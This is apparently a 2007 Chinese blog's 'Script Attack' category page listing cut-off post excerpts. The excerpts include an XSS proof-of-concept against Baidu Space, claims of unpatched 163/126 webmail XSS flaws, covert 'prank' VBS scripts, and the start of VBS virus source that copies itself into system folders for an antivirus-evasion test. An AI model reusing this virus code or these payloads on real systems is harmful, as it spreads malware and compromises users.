您正在查看 "Script Attack" 分类下的文章
2007-06-13 13:08
这个漏洞我已经确定了,不过不会完全公开。简单构造代码></a><script>alert('0day')</script><a>弹出期待已久的对话框。溢出!巧合……写过网页的人会知道,如果标签运用不合理,会造成整个页面的变形溢出……
百度空间在前台的安全性已经做的不错了,曾经风靡的CSS跨站漏洞也渐渐暗淡下去。想当初在5Q上也是这样……不过后台的安全性如何就不能知道的很清楚,即使你发现了什么跨站漏洞,也很难流行。那现在这个溢出漏洞存在哪里? |
2007-05-20 19:45
Sub TongJi()
Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objFile = objFSO.OpenTextFile("ok.txt", 1)
strText = objFile.ReadAll
All = Len(strText)
S="` ~ ! @ # $ % ^ & * ( ) - _ = + \ | [ { ] } ; : ' , < . > / ? · ! ¥ ( ) 、 【 】 ; : ‘ ’ “ ” , 《 。 》 ? …… —— chr(34) vbCrLf"
Signs=Split(S," ") |
2007-05-13 16:30
病毒专杀VBS模板今天继续更新,而且今后会将重心转向WMI对象的使用!WMI为MMC与脚本程序提供了访问操作系统构成单元的公共接口,所以通过WMI对象,我们可以完成更加强大的功能!好友看破红尘提出了一个 |
2007-05-12 17:54
4月30号公布163邮箱跨站漏洞,不过目前还没发现被利用的迹象,并且目前为止这些跨站漏洞还未被修补!难道非要等到像Yahoo mail worm(Yamanner)那样爆发才做出反应吗?我已经掌握了关键资料……这份分析报告是针对网易的两个邮箱:163与126的。关于漏洞利用细节请不要来问我……
一、163邮箱跨站漏洞:
163邮箱跨站漏洞我在之前的的 |
2007-05-09 17:08
从Microsoft那下载到这个小工具screnc.exe,这是命令行下的Script Encoder(脚本加密)。它可以加密asp文件、html文件、js,vbs,sct,wsh文件,非常的方便。具体使用方法在命令行下输入screnc /?即可查看,并且它自带有帮助说明书,我就不多介绍了。
下面介绍其简单的加密以及结合前面提到的一些解密方法来进行解密(以下的文件都保存在C:\下):
1、下面是要加密的脚本,此脚本保存为文件1.htm:
<Script language="javascript">
alert('http://h |
2007-05-06 21:14
在JavaScript网页的解密中。<xmp>标签居然也起到很重要的作用!因为这对<xmp></xmp>标签内的HTML元素将被渲染为文本,按原样输出。将下面代码保存为xmp.htm,你试试就知道了:)
<xmp>
<html>
<head>
<title>JavaScript解密/title>
</head>
<body>
xmp内的所有标签将被显示!
</body>
</xmp>
1、根据这个原理,我们就可以开始构造代码,以将HTML中被加密了的代码解密出来,这样解密出的 |
2007-05-05 19:28
VBS,VBScript代码写久了,回到JavaScript有点不习惯了……文章开始前先附上“网页加解密”很全的工具,可以到我网盘下载http://ycosxhack.ys168.com/,“黑客工具”目录,文件名为“网页加解密.rar”。
要继续看下面的文字首先记住两个原理:
原理1:无论源码被如何加密,被如何限制,最终都将还原成浏览器可以识别的HTML代码。
原理2:解铃还须系铃人。
一、要解密一个网页我们必须 |
2007-05-01 22:33
一边在完善自己的病毒专杀VBS模板,一边就在进行邪恶的行动。张三丰那句话还真有道理:这正邪二字,原本难分!现在介绍的两个有点“邪恶”的VBS其实就是恶作剧罢了,或图个好玩。但是如果你想歪了,估计这两个“邪恶”的VBS就真正是很邪恶了……
一、在后台偷偷运行着某程序:
Set objShell = CreateObje |
2007-04-27 23:10
VBS中SendKeys方法将响应键盘的操作,并发送此值。这样将实现许多有趣、适用、方便的功能!基本上只要键盘能完成的操作,SendKeys就能一并完成。你想到了什么?嘿嘿!下面的代码是经过我一个晚上的整理与测试。其中QQ自动登录的不成功!不是代码不行,估计是最新版QQ的保护机制!
第一个例子、将下面这段代码保存为ie.vbs,运行此vbs,将会打开我的博客。
set s = WScript.CreateObject("WScript.Shell") '创建WScript.Shell对象
app=s. |
2007-04-06 14:07
我就选择昨天写的“VBS病毒源码”的一段代码进行免杀测试,下面这段代码会将病毒自身分别拷贝到windows目录、system32目录、temp目录下,文件名为随机数字。
on error resume next
set fso=createobject("scripting.filesystemobject")
randomize
name=int(rnd*10000000+1)
temp=name
for i=0 to 2
set dir = fso.getspecialfolder(i) |
|
| 
